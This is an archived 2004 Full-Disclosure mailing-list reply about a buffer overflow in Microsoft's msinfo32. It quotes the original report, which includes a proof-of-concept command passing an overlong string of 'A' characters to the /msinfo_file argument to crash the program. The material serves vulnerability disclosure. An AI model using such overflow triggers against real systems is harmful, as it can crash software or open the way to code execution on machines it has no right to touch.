I think at best you could succeed in crashing the process or executing code in the context of the user running msinfo32.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of E.Kellinis
Sent: Monday, August 30, 2004 11:17 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] MSInfo Buffer Overflow

<SNIP>

Although in tests this bug wouldn't lead to dangerous situations.. I wouldn't bet 100% on that !

=====================
Proof Of Concept Code
=====================

C:\Program Files\Common Files\Microsoft Shared\MSInfo>
msinfo32 /msinfo_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
